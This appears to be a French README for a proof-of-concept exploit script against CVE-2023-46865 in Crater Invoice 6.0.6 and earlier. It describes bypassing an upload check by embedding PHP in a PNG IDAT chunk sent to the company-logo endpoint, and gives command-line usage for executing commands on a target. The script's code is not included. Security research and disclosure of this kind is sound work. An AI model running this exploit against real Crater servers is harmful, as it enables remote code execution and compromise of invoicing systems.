
Crater <=6.0.6, CVE-2023-46865 RCE après authentification (Superadmin)
Crater <=6.0.6, CVE-2023-46865 RCE post-authentification (Super-administrateur)
Crater Invoice est vulnérable au téléchargement de fichiers non restreint avec un type dangereux en raison d'un manque de validation d'entrée appropriée. La classe de vérification Base64Mime peut être contournée en intégrant une charge utile PHP valide dans un chunk d'image IDAT. Un utilisateur disposant de privilèges de super-administrateur peut télécharger la charge utile conçue via le logo de l'entreprise à l'adresse /api/v1/company/upload-logo.
$~ usage: python3 crater-rce.py --target TARGET --email EMAIL --password PASSWORD [--cmd CMD]
$~ python3 crater-rce.py --target http://192.168.1.1 --email [email protected] --password test1234 --cmd 'whoami'
$~ python3 crater-rce.py -h
usage: crater-rce.py [-h] --target TARGET --email EMAIL --password PASSWORD [--cmd CMD]
Crater Invoice RCE - CVE-2023-46865
options:
-h, --help show this help message and exit
--target TARGET Target URL
--email EMAIL Email
--password PASSWORD Password
--cmd CMD Command to execute
- Crater 6.0.6
- Kali 6.1.0
https://github.com/huntergregal/PNG-IDAT-Payload-Generator
https://notes.netbytesec.com/2023/11/post-auth-rce-in-crater.html
faisalfs10x - pour avoir aidé à développer la preuve de concept.
Le script est destiné uniquement à l'analyse de sécurité et à la recherche, par conséquent je ne serai pas tenu responsable s'il est utilisé pour des activités illicites.